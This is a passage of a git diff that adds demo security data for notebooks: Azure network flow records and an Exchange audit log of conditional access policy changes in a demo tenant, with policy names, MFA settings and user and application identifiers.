+543,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 12:25:05.541,2019-02-14 11:05:02.000,2019-02-14 11:56:27.000,2019-02-14 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+540,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 12:25:05.541,2019-02-14 11:11:26.000,2019-02-14 11:11:26.000,2019-02-14 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,1.0
+535,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 12:25:05.525,2019-02-14 11:21:58.000,2019-02-14 11:21:58.000,2019-02-14 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+0,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 13:23:59.512,2019-02-14 12:21:58.000,2019-02-14 12:21:58.000,2019-02-14 13:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+1,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 13:23:59.512,2019-02-14 12:29:02.000,2019-02-14 12:29:02.000,2019-02-14 13:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
diff --git a/docs/notebooks/data/demo_exchange_data.csv b/docs/notebooks/data/demo_exchange_data.csv
new file mode 100644
index 000000000..8ff113eeb
--- /dev/null
+++ b/docs/notebooks/data/demo_exchange_data.csv
@@ -0,0 +1,34465 @@
+TimeGenerated,UserId,ClientIP,Operation,Parameters
+2020-04-18T04:50:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 4:50:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T04:50:31Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 4:50:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T04:50:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 4:50:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T04:50:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 4:50:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T04:50:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 4:50:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T04:50:31Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 4:50:31 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T04:50:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 4:50:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T04:50:31Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 4:50:31 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-18T04:50:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 4:50:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T04:50:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 4:50:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T04:50:31Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 4:50:31 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T04:50:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 4:50:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T04:50:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 4:50:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-19T02:55:49Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/19/2020 2:55:49 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-19T02:55:49Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/19/2020 2:55:49 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-19T02:55:49Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/19/2020 2:55:49 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-19T02:55:49Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/19/2020 2:55:49 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-19T02:55:49Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/19/2020 2:55:49 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-19T02:55:49Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/19/2020 2:55:49 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-19T02:55:49Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/19/2020 2:55:49 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-19T02:55:49Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/19/2020 2:55:49 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-19T02:55:49Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/19/2020 2:55:49 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-19T02:55:49Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
